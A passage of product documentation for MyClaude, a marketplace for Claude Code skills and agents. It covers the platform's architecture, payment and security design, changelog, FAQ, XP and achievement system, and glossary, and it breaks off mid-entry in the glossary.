# Architecture MyClaude uses a dual Firebase SDK architecture with server-side rendering, Stripe Connect for payments, Cloudflare R2 for product files, and automated content scanning via the CONDUIT pipeline. ## System overview MyClaude is a marketplace with eight moving parts. Each component has a single responsibility and communicates through well-defined boundaries. Here is the full picture: ``` +------------------+ | myclaude.sh | | (Web App) | | Next.js 16 | +--------+---------+ | +-------------+-------------+ | | +--------+--------+ +--------+--------+ | Server Components| | Client Components| | (SSR pages) | | ("use client") | | Firebase Admin | | Firebase Client | +--------+--------+ +--------+---------+ | | +-------------+-------------+ | +--------+---------+ | API Layer | | /api/ routes | | Firebase Admin | +--------+---------+ | +-----------+-----------+-----------+-----------+ | | | | | +-----+-----+ +--+---+ +----+----+ +----+----+ +----+----+ | Firestore | | R2 | | Firebase| | Stripe | | CONDUIT | | (Database) | |(Files)| | Storage | | Connect | |(Pipeline)| +------------+ +------+ | (Assets)| +---------+ +---------+ +---------+ ``` ``` +------------------+ | @myclaude-cli | | (CLI) | +--------+---------+ | +--------+---------+ | API Layer | | /api/ routes | +------------------+ ``` The CLI is a thin client. It authenticates, then calls the same API routes that the web application uses. There is no separate backend for CLI operations. ## Components ### Web application The web application is a Next.js 16 App Router project deployed on Vercel. It uses two rendering strategies depending on the page: | Page | Rendering | Reason | |------|-----------|--------| | `/explore` | Server-side (SSR) | SEO — product listings must be indexable | | `/p/[slug]` | Server-side (SSR) | SEO — individual product pages with OpenGraph metadata | | `/u/[username]` | Server-side (SSR) | SEO — creator profiles | | `/dashboard` | Client-side | Authenticated-only, no SEO value | | `/publish` | Client-side | Authenticated-only | | `/login`, `/register` | Client-side | Auth forms | Server-rendered pages use the Firebase Admin SDK to fetch data, strip sensitive fields (producing `SafeProduct` and `SafeUserProfile` types), and pass the sanitized data to client islands for interactivity like liking or downloading. ### Dual Firebase SDK pattern This is the most important architectural decision in MyClaude. Two Firebase SDKs coexist in the same codebase, strictly separated: ``` src/lib/ server/ # Firebase Admin SDK — server only firebase-admin.ts # Initialization (lazy proxy pattern) products.ts # getProduct(), listProducts(), getProductBySlug() users.ts # getUserProfile(), getUserByUsername() stripe.ts # Stripe server SDK rate-limit.ts # In-memory rate limiter client/ # Firebase Client SDK — browser only firebase.ts # Client initialization auth.ts # signIn, signOut, onAuthChange firestore.ts # Client-side reads, real-time listeners product-service.ts # toggleLike, trackDownload, createProduct user-service.ts # updateProfile, createProfile storage.ts # File uploads ``` | Context | SDK | Location | |---------|-----|----------| | Server Components (SSR) | Firebase Admin | `lib/server/` | | API Routes (mutations) | Firebase Admin | `lib/server/` | | Client Components (browser) | Firebase Client | `lib/client/` | | Stripe Webhooks | Firebase Admin | `lib/server/` | The Admin SDK runs with full privileges on the server. The Client SDK runs in the browser with permissions enforced by Firestore security rules. These two SDKs never import each other. A server file importing from `lib/client/` or a client file importing from `lib/server/` is a bug. ### API layer All mutations flow through Next.js API routes under `/api/`. Every mutation route follows the same verification sequence: 1. Extract `Authorization: Bearer {token}` from the request header 2. Verify the token with `admin.auth().verifyIdToken(token)` 3. Confirm the caller is authorized for the specific operation 4. Return `401` if the token is missing, expired, or invalid Rate limiting protects all mutation endpoints. Stripe webhook routes verify the webhook signature instead of a user token. ### Database (Cloud Firestore) Firestore stores four primary collections: | Collection | Purpose | Read access | Write access | |------------|---------|-------------|--------------| | `products` | Product listings, metadata, stats | Public (published) | Owner via Admin SDK | | `users` | Profiles, preferences, XP | Public (profile data) | Owner via Admin SDK | | `orders` | Purchase records | Owner only | Webhook only (Admin SDK) | | `reviews` | Product reviews and ratings | Public | Authenticated buyers | Firestore security rules enforce ownership at the database level, independent of application logic. Even if application code has a bug, a user cannot read another user's orders or modify another user's products. ### Storage (hybrid architecture) MyClaude uses two storage backends: | Backend | Purpose | Access method | |---------|---------|---------------| | Cloudflare R2 | Product files (skills, agents, bundles) | Signed URLs generated server-side | | Firebase Storage | User assets (avatars, screenshots) | Client SDK with security rules | Product files for paid products are never exposed directly to the browser. The `fileUrl` field is stripped from all client-facing responses. Downloads go through `/api/products/download`, which verifies the caller's purchase order before generating a time-limited signed URL. ### Payments (Stripe Connect Express) MyClaude uses Stripe Connect Express for marketplace payments. Creators connect their own Stripe accounts and receive payouts directly from Stripe — MyClaude never holds creator funds. ``` Purchase flow: Buyer clicks "Buy" | v POST /api/stripe/checkout (auth token) | v API verifies token, creates Checkout Session | v Buyer completes payment on Stripe | v Stripe fires webhook → POST /api/stripe/webhooks | v Webhook handler creates order in Firestore | v Buyer returns to product page → order verified → download available ``` The platform retains an 8% fee via Stripe's application fee mechanism. The remaining 92% goes directly to the creator's connected Stripe account. Orders are created exclusively by the webhook handler. There is no client-side code path that can create an order. This is a security invariant. ### Authentication (Firebase Auth) Firebase Auth handles user identity. Supported providers: - Email and password - Google OAuth When a user logs in, Firebase issues a JWT (JSON Web Token) valid for 1 hour, automatically refreshed by the client SDK. Every API request includes this token in the `Authorization` header. The Admin SDK verifies it server-side. Unauthenticated users can browse all public product listings and creator profiles. Any write operation — publishing, purchasing, reviewing, downloading paid files — requires a valid token. ### Content pipeline (CONDUIT) CONDUIT is the publishing pipeline that every product passes through before appearing on the marketplace. When a creator runs `myclaude publish`, the pipeline executes in sequence: ``` myclaude publish | v Validate vault.yaml (schema, required fields, version format) | v Content scan (secrets, malicious patterns, policy violations) | v Upload product files to storage | v Create or update product listing in Firestore | v Product live on marketplace ``` Products that fail validation or scanning are rejected before listing. The creator receives a specific error message identifying the issue. Details on what the scanner checks are in the [Security Model](/docs/security/model). ## Design principles Three principles guided the architecture: **Security first.** Every trust boundary is enforced at the infrastructure level, not just application logic. Firestore rules, storage rules with `allow read: if false`, and webhook-only order creation all ensure that a bug in application code cannot bypass security controls. **SSR for discoverability.** Product listings, individual product pages, and creator profiles are server-rendered. Search engines and AI systems receive fully rendered HTML with structured metadata. Authenticated dashboard pages, which have no SEO value, render client-side to reduce server load. **Thin client, thick server.** The CLI, browser client components, and any future integrations all call the same API routes. Business logic lives in one place: the server. Clients are presentation layers. ## Technology choices | Layer | Choice | Rationale | |-------|--------|-----------| | Framework | Next.js 16 (App Router) | Server components for SSR, API routes in the same project, Vercel deployment | | Language | TypeScript | Type safety across server and client boundaries | | Database | Cloud Firestore | Real-time listeners, security rules, no server to manage | | Auth | Firebase Auth | JWT-based, multiple providers, Admin SDK for server verification | | Payments | Stripe Connect Express | Marketplace-native, PCI compliant, creator payouts without holding funds | | Product storage | Cloudflare R2 | S3-compatible, no egress fees, signed URL support | | Asset storage | Firebase Storage | Integrated with Firebase Auth, client SDK for direct uploads | | CSS | Tailwind v4 | Utility-first, design token integration, zero runtime | | UI components | shadcn/ui | Accessible, composable, source-owned (not a dependency) | | Deploy | Vercel | Zero-config Next.js deployment, edge network, preview deploys | ## Data flow: browse, purchase, publish ### Browsing a product ``` Browser → GET /explore → Next.js Server Component → Firebase Admin SDK reads Firestore (products collection) → Strips sensitive fields → SafeProduct[] → Renders HTML server-side → Sends to browser with hydration islands for interactivity ``` ### Purchasing a product ``` Browser → POST /api/stripe/checkout (Bearer token) → Admin SDK verifies token → Creates Stripe Checkout Session (8% application fee) → Returns checkout URL → Browser redirects to Stripe → Buyer pays → Stripe webhook fires → POST /api/stripe/webhooks → Verifies signature → Creates order in Firestore → Buyer can download ``` ### Publishing a product ``` CLI → myclaude publish → Reads vault.yaml → Validates schema → Runs myclaude scan → Checks secrets, patterns, policy → POST /api/products (Bearer token) → Admin SDK verifies token and authorization → Uploads files to R2 → Creates listing in Firestore → Product live on /explore and /p/[slug] ``` ## Related pages - [Concepts Overview](/docs/getting-started/concepts) — the mental model behind the marketplace - [Security Model](/docs/security/model) — detailed security controls and enforcement - [CLI Commands](/docs/cli/commands) — full command reference - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest format --- # Changelog Version history of the MyClaude platform. Every release, what changed, and what to expect next. This changelog covers the MyClaude platform as a whole: the web application at myclaude.sh, the API, and the CLI. Each entry lists what shipped, what to be aware of, and any breaking changes. Most recent release first. --- ## v1.0.0 — 2026-03-25 **Initial public launch.** MyClaude is the first marketplace purpose-built for the Claude Code ecosystem. This release ships the complete marketplace infrastructure: discovery, purchase, publishing, and developer tooling. ### Marketplace - 9 product categories: Skills, Squads, Agents, Workflows, Design Systems, Prompts, CLAUDE.md, Applications, and Systems — see [Product Types](/docs/buyers/product-types) for definitions - Server-rendered product pages (`/p/[slug]`) and creator profiles (`/u/[username]`) with full OpenGraph and structured data metadata for search engine and AI agent discoverability - Explore page (`/explore`) with category filtering, search, and sorting — server-rendered for SEO - Product detail pages with markdown descriptions, user reviews, version history, download controls, and like/share actions - Creator profiles with published product listings, download stats, and bio - Landing page with hero section, category browser, and featured products - Dark terminal aesthetic with warm terracotta palette and phosphor category colors - Custom design system: Minor Third typography scale, 4px spacing grid, glow-only shadows, 5-level surface hierarchy ### Payments - Stripe Connect Express integration — creators connect their own Stripe accounts and receive payouts directly from Stripe - 92/8 revenue split — creators receive 92% of each sale, MyClaude retains 8% via Stripe application fee - Secure purchase flow: Stripe Checkout sessions created server-side with auth verification, orders created exclusively by Stripe webhook handler - Free and paid product support — free products skip the checkout flow entirely - No card data touches MyClaude servers — all payment processing handled by Stripe (PCI DSS Level 1) ### CLI (`@myclaude-cli/cli`) - 12 commands covering the full product lifecycle: | Command | Purpose | |---------|---------| | `myclaude login` | Authenticate via browser OAuth | | `myclaude logout` | Clear local session | | `myclaude whoami` | Show current authenticated user | | `myclaude search` | Find products by keyword or category | | `myclaude install` | Download and install a product | | `myclaude uninstall` | Remove an installed product | | `myclaude update` | Update installed products to latest version | | `myclaude init` | Scaffold a new product directory | | `myclaude publish` | Publish via CONDUIT pipeline | | `myclaude scan` | Run content scanning locally | | `myclaude info` | Show details for a product | | `myclaude version` | Print CLI version | - CONDUIT publishing pipeline: validate `vault.yaml` schema, scan for secrets and malicious patterns, upload product files to storage, create or update listing - Product scaffolding with `myclaude init` generates `SKILL.md` (or category-appropriate content file) and `vault.yaml` manifest ### Security - Firebase Auth with email/password and Google OAuth providers - Dual Firebase SDK architecture — Admin SDK for server operations, Client SDK for browser operations, with strict import boundaries preventing cross-contamination - Firestore security rules enforce data ownership at the database layer, independent of application logic - Signed URLs for paid product downloads with 5-minute expiry — `fileUrl` field is stripped from all client-facing API responses - Firebase Storage rules set to `allow read: if false` for product files — access only via server-generated signed URLs - Webhook-only order creation — no client-side code path can create an order, preventing purchase forgery - Rate limiting on all mutation API routes (60 req/min general, 10 req/min checkout, 20 req/min downloads) - Server-side input sanitization with DOMPurify before rendering user-generated content - Automated content scanning on every publish via CONDUIT pipeline: secrets detection, malicious pattern analysis, policy enforcement, manifest validation - 167 end-to-end and integration security tests covering auth flows, payment integrity, file access controls, and injection prevention ### Documentation - PRISM documentation system: 46+ pages across 3 surfaces - **Human surface:** structured guides with Diataxis framework (tutorials, how-tos, explanations, references) - **Agent surface:** `agent_summary` frontmatter field on every page for AI agent consumption - **GEO surface:** `geo_quotable` frontmatter field, structured data (`schema_type`), and keyword optimization for generative search engines - 7 sections: Getting Started, Buyers, Creators, CLI, API, Security, Legal - Built with Fumadocs on Next.js — MDX content with custom components ### Infrastructure - Next.js 16 App Router deployed on Vercel with edge network distribution - Cloud Firestore for all application data (products, users, orders, reviews) - Cloudflare R2 for product file storage — S3-compatible with zero egress fees - Firebase Storage for user-uploaded assets (avatars, screenshots) - SSR for all SEO-critical pages (`/explore`, `/p/[slug]`, `/u/[username]`); client-side rendering for authenticated dashboard pages - TypeScript strict mode across the entire codebase - Tailwind CSS v4 with custom design tokens and utility classes ### Known limitations at launch - Search is client-side filtering only — full-text search with a dedicated search engine is planned for v1.1 - No email notifications for purchases, product updates, or review activity yet - Admin moderation tools are internal-only — no public-facing admin dashboard - Single language (English) — i18n infrastructure and translation dictionaries exist but only English strings are shipped - No product collections or curated lists — all discovery is via search and category browse - No creator analytics beyond basic download counts --- ## Upcoming Features under active development or planned for near-term releases. Dates are targets, not commitments. ### v1.1 — Search and notifications Targeted for Q2 2026. Focus: discoverability and communication. - Full-text product search powered by a dedicated search engine (Algolia or Typesense under evaluation) - Email notifications for purchase confirmation, product update alerts, new review notifications, and weekly creator digest - Verified creator badges — manual verification initially, automated pipeline later - Improved explore page with trending products, "new this week" section, and recommendation signals ### v1.2 — Admin and moderation Targeted for Q3 2026. Focus: marketplace governance at scale. - Public admin dashboard for content moderation with queue management and audit trail - Automated content re-scanning on a recurring schedule to catch newly identified patterns - Creator analytics dashboard with revenue charts, download trends, and geographic distribution - Bulk product management tools for creators with large catalogs ### v1.3 — Internationalization Targeted for Q3 2026. Focus: global accessibility. - Full i18n for the web UI (English, Portuguese, Spanish) using the existing translation dictionary infrastructure - Localized product metadata support — creators can provide descriptions in multiple languages - Currency display localization based on user region - Right-to-left layout support evaluation ### Future These features are planned but not yet scheduled: - **MCS certification pipeline** — MyClaude Certified Standard automated testing and badge issuance for products that pass quality, security, and usability thresholds - **Product collections** — curated lists and themed bundles (e.g., "Essential Security Skills", "Starter Pack for New Teams") - **Creator teams** — organization accounts with shared product ownership, revenue splitting, and role-based access - **API rate limit dashboard** — creators can monitor their API usage and adjust rate limits on their published products - **Dedicated status page** — status.myclaude.sh with real-time monitoring, historical uptime, and incident timeline - **Webhook integrations** — notify external systems when products are purchased, updated, or reviewed --- ## Versioning policy MyClaude follows semantic versioning for platform releases: | Component | Format | Example | |-----------|--------|---------| | Platform release | `MAJOR.MINOR.PATCH` | v1.0.0 | | CLI package | `MAJOR.MINOR.PATCH` | 1.0.0 (npm) | | API | Unversioned (backward compatible) | `/api/products/download` | **Major** versions indicate breaking changes to the API or CLI. **Minor** versions add features without breaking existing integrations. **Patch** versions fix bugs. Breaking changes, when they happen, will be announced at least 2 weeks in advance through the changelog and the MyClaude status channels. ## Related pages - [System Status](/docs/getting-started/system-status) — current platform health - [Architecture](/docs/getting-started/architecture) — how the system is built - [CLI Commands](/docs/cli/commands) — full CLI reference --- # Concepts Overview Every Claude Code project eventually builds something reusable — a skill, an agent config, a workflow. MyClaude is the marketplace that turns those artifacts into installable, searchable, monetizable products. One command to install, one command to publish, 92% of revenue goes to creators. ## What is MyClaude? MyClaude is the only marketplace purpose-built for the Claude Code ecosystem. It provides what free directories cannot: content security scanning (22 malicious pattern detectors), purchase-verified reviews, Stripe Connect payments, a dedicated CLI with 12 commands, and 11 machine-readable specs for AI agent integration. Creators publish reusable components — skills, agents, squads, workflows, and 5 more categories — that other developers install with `myclaude install @creator/product`. Creators receive 92% of each sale, the highest revenue share in any AI tool marketplace (Apple App Store takes 30%, most SaaS marketplaces take 20-40%). ## The 9 product categories Each category targets a different layer of the Claude Code ecosystem: | Category | Definition | Example | |----------|-----------|---------| | [Skills](/docs/buyers/product-types) | Callable prompt routines stored in `.claude/skills/` that extend Claude Code with domain-specific capabilities. | `/commit`, `/review-pr`, `/aegis` | | [Squads](/docs/buyers/product-types) | Multi-agent teams with coordinated workflows, enabling complex tasks through agent collaboration. | Copy Squad (15 specialized agents) | | [Agents](/docs/buyers/product-types) | Single-purpose AI agents with specialized knowledge and defined tool access. | Security Auditor, Code Reviewer | | [Workflows](/docs/buyers/product-types) | Multi-step automation pipelines that chain tools, agents, and skills into repeatable processes. | CI/CD pipeline, deploy workflow | | [Design Systems](/docs/buyers/product-types) | Complete token sets, component libraries, and design rules for consistent UI development. | Terminal Dark DS, Brand Kit | | [Prompts](/docs/buyers/product-types) | Reusable system prompts and templates optimized for specific tasks or domains. | Legal contract analyzer | | [CLAUDE.md](/docs/buyers/product-types) | Project configuration files with rules, context, and behavioral directives for Claude Code. | Enterprise compliance config | | [Applications](/docs/buyers/product-types) | Full applications built for/with Claude Code, ready to deploy. | Dashboard generator, API scaffolder | ## How the marketplace works The lifecycle of every MyClaude product follows 5 steps: ``` Create → Publish → Discover → Install → Use ``` 1. **Create** — Build a skill, agent, squad, or any product type using the Creator Engine or manually 2. **Publish** — Define a `vault.yaml` manifest and run `myclaude publish` from the CLI 3. **Discover** — Browse on [myclaude.sh/explore](/explore), search with `myclaude search`, or find via AI engines 4. **Install** — Run `myclaude install @creator/product-name` to add it to your environment 5. **Use** — The product is active in your Claude Code session immediately ## Key concepts **vault.yaml** — Every product has a manifest file. It defines name, version, category, pricing, and configuration in 9-15 lines of YAML. Think of it as `package.json` for Claude Code products. [Full specification](/docs/creators/vault-yaml). **CONDUIT** — The publishing pipeline that connects Creator Engine to CLI to marketplace API. Handles validation, content scanning, and listing creation automatically. **MCS (MyClaude Certified Standard)** — A quality badge for products that pass automated and manual review. MCS-certified products appear higher in search results and receive a verification badge. ## For buyers vs. for creators | | Buyers | Creators | |---|--------|---------| | **Goal** | Find and use quality tools | Build and monetize tools | | **Start here** | [Quickstart](/docs/getting-started/quickstart) | [Creator Onboarding](/docs/creators/onboarding) | | **Key action** | `myclaude install @creator/product` | `myclaude publish` | | **Revenue** | Pay per product or use free products | Receive 92% of each sale | | **Quality signal** | Look for MCS badge | Earn MCS certification | ## Related pages - [Quickstart](/docs/getting-started/quickstart) — install and start using MyClaude in 5 minutes - [Product Types Explained](/docs/buyers/product-types) — detailed category definitions - [Glossary](/docs/getting-started/glossary) — all terms defined --- # FAQ Answers to the most common questions about MyClaude — the Claude Code ecosystem marketplace. MyClaude supports 9 product categories, one-command CLI install, Stripe-powered creator payments (92% revenue share), and automated security scanning on every upload. ## General ### What is MyClaude? MyClaude is the only dedicated marketplace for the Claude Code ecosystem. Creators publish reusable components — skills, agents, squads, workflows, design systems, prompts, CLAUDE.md configs, applications, and systems — that buyers install with `myclaude install @creator/product`. Unlike free directories, MyClaude provides content security scanning (22 malicious patterns), purchase-verified reviews, Stripe Connect payments, and a dedicated CLI with 12 commands. ### Is MyClaude free to use? Browsing, searching, and installing free products costs nothing. Paid products are priced by creators. The platform charges an 8% fee on paid sales. ### What product categories does MyClaude support? MyClaude supports 9 categories: Skills, Squads, Agents, Workflows, Design Systems, Prompts, CLAUDE.md, Applications, and Systems. See [Product Types](/docs/buyers/product-types) for definitions. ## For buyers ### How do I install a product? ```bash $ myclaude install @creator/product-name ``` See [Quickstart](/docs/getting-started/quickstart) for the full tutorial. ### Do I need the CLI? The CLI is the primary installation method. You can also browse and purchase products via the web at [myclaude.sh/explore](/explore). ### How do I update an installed product? ```bash $ myclaude update @creator/product-name ``` ### Can I get a refund? Contact the creator directly or reach out via [myclaude.sh/contact](/contact). Refund policies vary by creator. ### Are products safe to install? All products undergo automated content scanning before listing — JSZip extraction with 22 malicious pattern detectors, compression ratio checks (>100:1 rejected), and path traversal prevention. MCS-certified products receive additional quality review. See [Security Model](/docs/security/model) for details. ## For creators ### How do I publish a product? 1. Install the CLI: `npm install -g @myclaude-cli/cli` 2. Scaffold: `myclaude init my-product` 3. Edit `SKILL.md` and `vault.yaml` 4. Publish: `myclaude publish` See [Publishing Guide](/docs/creators/publishing) for the full tutorial. ### How much does it cost to publish? Publishing is free. MyClaude charges an 8% platform fee only on paid product sales. ### How do I set up payments? Connect your Stripe account during [Creator Onboarding](/docs/creators/onboarding). MyClaude uses Stripe Connect Express — setup takes under 5 minutes. ### What is vault.yaml? A 9-15 line YAML manifest that defines your product's metadata, pricing, and configuration. See [vault.yaml Specification](/docs/creators/vault-yaml). ### What is MCS certification? MyClaude Certified Standard is a quality badge for products that pass automated and manual review. MCS products appear higher in search results. ### Can I publish private products? Not currently. All published products are public. Private/team distribution is planned for a future release. ## Technical ### What is the CONDUIT protocol? CONDUIT (Engine-to-CLI-to-API pipeline) handles the publishing flow: validates vault.yaml, scans content, uploads files, and creates the marketplace listing. ### Does MyClaude have an API? Yes. The REST API is defined in the [OpenAPI spec](/specs/openapi.yaml). Full API reference documentation is coming in a future release. ### Can AI agents interact with MyClaude? Yes. MyClaude provides machine-readable specs at `/specs/`, behavioral directives in [`/llms.txt`](/llms.txt), and Markdown mirrors via `.md` suffix on any docs URL. See the [docs home](/docs) for a full list of agent resources. ## Related pages - [Quickstart](/docs/getting-started/quickstart) — get started in 5 minutes - [Concepts Overview](/docs/getting-started/concepts) — marketplace mental model - [Glossary](/docs/getting-started/glossary) — all terms defined - [Pricing & Revenue](/docs/getting-started/pricing) — revenue model details --- # Gamification MyClaude awards XP for 8 actions, tracks 45 achievements across 9 categories, and assigns ranks from Newcomer to Legend based on a square-root level curve. Every number on this page is pulled directly from the production codebase. ## How does the XP system work? You earn XP by taking actions on the marketplace. Each action has a fixed XP reward. | Action | XP | Trigger | |--------|---:|---------| | `publish` | 100 | You publish a product | | `first_sale` | 200 | You make your first ever sale (one-time bonus) | | `streak_publish` | 50 | You publish 3+ products (bonus per product after the 3rd) | | `purchase` | 50 | Someone purchases your product | | `follower` | 15 | Someone follows you | | `review` | 10 | Someone reviews your product | | `download` | 5 | Someone downloads your product | | `like` | 3 | Someone likes your product | Publishing and selling are weighted highest because they create the most marketplace value. Passive actions (downloads, likes) earn less but accumulate over time. ## How is XP deduplicated? Every XP award is logged to a `xp_logs/{uid}_{action}_{key}` document in Firestore. The deduplication key is either the specific product ID or a 1-minute time window (floor of `Date.now() / 60000`). If a log entry already exists for that combination, no XP is awarded. This prevents farming. You cannot earn `download` XP twice for the same product from the same user, and generic actions are rate-limited to once per minute. ## How does the level curve work? Levels follow a square-root curve: ``` level = floor(sqrt(xp / 100)) ``` To find the XP required for any level: `xp = level^2 * 100`. | Level | XP required | XP to next level | Rank unlocked | |------:|------------:|------------------:|--------------| | 0 | 0 | 100 | Newcomer | | 1 | 100 | 300 | Bronze | | 2 | 400 | 500 | -- | | 3 | 900 | 700 | Silver | | 4 | 1,600 | 900 | -- | | 5 | 2,500 | 1,100 | Gold | | 6 | 3,600 | 1,300 | -- | | 7 | 4,900 | 1,500 | Platinum | | 8 | 6,400 | 1,700 | -- | | 9 | 8,100 | 1,900 | -- | | 10 | 10,000 | 2,100 | Diamond | | 15 | 22,500 | 3,100 | Master | | 20 | 40,000 | 4,100 | Legend | The curve is deliberately steep. Reaching Diamond (L10) requires 10,000 XP. Reaching Legend (L20) requires 40,000 XP -- four times as much. This ensures high ranks represent sustained contribution, not a single viral product. ## What are the 8 ranks? Each rank corresponds to a minimum level and has a distinct visual presentation. | Rank | Emoji | Min level | Min XP | Color | Glow | |------|:-----:|----------:|-------:|-------|------| | Newcomer | `🔘` | 0 | 0 | Muted | None | | Bronze | `🟤` | 1 | 100 | Amber 600 | None | | Silver | `⚪` | 3 | 900 | Slate 300 | None | | Gold | `🟡` | 5 | 2,500 | Yellow 400 | None | | Platinum | `💠` | 7 | 4,900 | Cyan 300 | Primary glow | | Diamond | `💎` | 10 | 10,000 | Blue 400 | Primary glow | | Master | `🏆` | 15 | 22,500 | Purple 400 | Primary glow | | Legend | `👑` | 20 | 40,000 | Primary (terracotta) | Primary glow | Ranks from Platinum onward receive a glow effect on their profile badge. Your rank updates automatically when your level crosses a threshold -- there is no manual promotion. ## What achievements exist? MyClaude tracks 45 achievements across 9 categories. Each achievement has a tier (bronze, silver, gold, or diamond) that determines its visual treatment. ### Publishing (5 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Genesis | Bronze | `🚀` | Published 1 product | | Creator | Silver | `📦` | Published 5 products | | Prolific | Gold | `🏭` | Published 10 products | | Factory | Diamond | `⚡` | Published 25 products | | Architect | Diamond | `🌌` | Published 50 products | ### Downloads (5 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | First Wave | Bronze | `📥` | 10 total downloads | | Rising | Silver | `📊` | 50 total downloads | | Trending | Gold | `🔥` | 100 total downloads | | Viral | Diamond | `💎` | 500 total downloads | | Tsunami | Diamond | `🌊` | 1,000 total downloads | ### Followers (5 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Noticed | Bronze | `👤` | 5 followers | | Influencer | Silver | `👥` | 25 followers | | Leader | Gold | `⭐` | 100 followers | | Icon | Diamond | `👑` | 500 followers | | Institution | Diamond | `🏛️` | 1,000 followers | ### Likes (4 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Liked | Bronze | `❤️` | 10 likes | | Popular | Silver | `💕` | 50 likes | | Beloved | Gold | `💖` | 200 likes | | Legendary Love | Diamond | `💝` | 500 likes | ### Revenue and sales (5 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Seller | Bronze | `🔗` | Connected Stripe account | | Merchant | Silver | `💰` | Made 1 sale | | Entrepreneur | Gold | `💵` | Made 10 sales | | Mogul | Diamond | `🏦` | Made 50 sales | | Tycoon | Diamond | `🤑` | Made 100 sales | ### Reviews (3 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Reviewed | Bronze | `📝` | Received 1 review | | Well Rated | Gold | `⭐` | Average rating 4.5+ with 5+ reviews | | Five Stars | Diamond | `🌟` | Perfect 5.0 rating with 10+ reviews | ### Rank milestones (8 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Bronze Rank | Bronze | `🟤` | Reached Level 1 | | Silver Rank | Bronze | `⚪` | Reached Level 3 | | Gold Rank | Silver | `🟡` | Reached Level 5 | | Platinum Rank | Silver | `💠` | Reached Level 7 | | Diamond Rank | Gold | `💎` | Reached Level 10 | | Master Rank | Gold | `🏆` | Reached Level 15 | | Legend Rank | Diamond | `👑` | Reached Level 20 | | Immortal | Diamond | `∞` | Reached Level 30 | The Immortal achievement sits beyond the named rank system. Level 30 requires 90,000 XP -- this is a long-term goal for the most active creators on the platform. ### Special and social (3 achievements) | Achievement | Tier | Icon | Requirement | |-------------|------|:----:|-------------| | Communicator | Bronze | `💬` | Sent 10+ messages | | Collector | Silver | `📚` | Purchased 5 products | | Completionist | Gold | `🎯` | Unlocked 20+ achievements | ### Category masters (7 achievements) Category masters reward depth in a single product type. Each requires 5 published products in that category. | Achievement | Tier | Icon | Category | |-------------|------|:----:|----------| | Skill Master | Gold | `🟢` | Skills | | Squad Master | Gold | `🔵` | Squads | | Agent Master | Gold | `🟠` | Agents | | Workflow Master | Gold | `🟣` | Workflows | | Design Master | Gold | `🩷` | Design Systems | | Prompt Master | Gold | `🔷` | Prompts | | App Master | Gold | `🟩` | Applications | All category master achievements are gold tier. There are no category masters for claude-md or systems categories. ## How does the rankings page work? The `/rankings` page shows a leaderboard sorted by XP. Each entry displays the user's rank badge, level, total XP, and achievement count. Rankings are computed client-side from Firestore queries ordered by the `xp` field. The leaderboard is public. Anyone can see it without authentication. Profile links from the leaderboard go to the user's public profile page at `/u/{username}`. ## How are XP and achievements verified? XP increments are written to the user's Firestore document using `FieldValue.increment()`, which is atomic. Firestore security rules restrict users to incrementing only their own XP field. Achievements are checked by `checkAndUnlockAchievements()`, which reads the user's profile stats and evaluates each achievement's condition function. If a condition is met and the achievement hasn't been unlocked yet, a document is written to the `users/{uid}/achievements/{achievementId}` subcollection. The write uses `setDoc` with `merge: true`, making it idempotent even if two calls race past the existence check. | Integrity measure | How it works | |-------------------|-------------| | XP deduplication | `xp_logs/{uid}_{action}_{key}` documents with 1-minute time windows | | Atomic increments | Firestore `FieldValue.increment()` prevents read-modify-write races | | Idempotent unlocks | `setDoc` with `merge: true` on achievement documents | | Client-side safety | XP is cosmetic (no financial impact), so client-side writes are acceptable | | Level recalculation | Level and rank are recomputed from total XP on every XP award, not stored incrementally | ## Achievement tier distribution | Tier | Count | Visual treatment | |------|------:|-----------------| | Bronze | 9 | Amber background, amber border | | Silver | 8 | Slate background, slate border | | Gold | 16 | Yellow background, yellow border | | Diamond | 12 | Cyan background, cyan border | The distribution skews toward gold and diamond because most categories have high-tier milestones. Bronze and silver achievements serve as early engagement hooks. ## Related pages - [Pricing and Revenue](/docs/getting-started/pricing) -- the 92/8 creator/platform split - [Concepts Overview](/docs/getting-started/concepts) -- marketplace mental model - [Rankings](/rankings) -- live leaderboard --- # Glossary Definitions of key terms used throughout MyClaude documentation. ## Product categories | Term | Definition | |------|-----------| | **Skill** | A callable prompt routine stored in `.claude/skills/` that extends Claude Code with domain-specific capabilities. Invoked with `/skill-name` in Claude Code. | | **Squad** | A multi-agent team with coordinated workflows, enabling complex tasks through agent collaboration. Defined by a roster of agents with assigned roles. | | **Agent** | A single-purpose AI entity with specialized knowledge and defined tool access. Operates autonomously within its domain. | | **Workflow** | A multi-step automation pipeline that chains tools, agents, and skills into a repeatable process. | | **Design System** | A complete token set, component library, and design rules for consistent UI development across projects. | | **Prompt** | A reusable system prompt or template optimized for a specific task or domain. | | **CLAUDE.md** | A project configuration file containing rules, context, and behavioral directives for Claude Code. | | **Application** | A full application built for or with Claude Code, ready to deploy. | ## Platform concepts | Term | Definition | |------|-----------| | **vault.yaml** | A 9-15 line YAML manifest that defines metadata, pricing, and configuration for any MyClaude product. Required for publishing. | | **CONDUIT** | The Engine-to-CLI-to-API publishing pipeline protocol. Connects Creator Engine, CLI, and marketplace API. | | **MCS** | MyClaude Certified Standard. A quality badge awarded to products that pass automated and manual review. | | **Creator Engine** | A standalone tool for building MyClaude products. Scaffolds vault.yaml, validates structure, and prepares for publishing. | | **MyClaude CLI** | Command-line interface for interacting with MyClaude marketplace. Install globally via `npm install -g @myclaude-cli/cli`. | ## Technical terms | Term | Definition | |------|-----------| | **PRISM** | Prismatic Documentation Architecture. The framework governing this docs system — one source, three surfaces. | | **H-Surface** | Human-facing documentation. The visual docs site with navigation and search. | | **A-Surface** | Agent-facing documentation. Machine-readable specs, MCP tools, and context payloads. | | **G-Surface** | GEO-facing documentation. Schema.org markup, llms.txt, and quotable passages for AI search engines. | | **GEO** | Generative Engine Optimization. Optimizing content for AI search engines like ChatGPT, Perplexity, and Google AI Overviews. | | **Diataxis** | A 4-type documentation model: Tutorial, How-To, Reference, Explanation. Used to classify every page. | | **llms.txt** | A machine-readable site 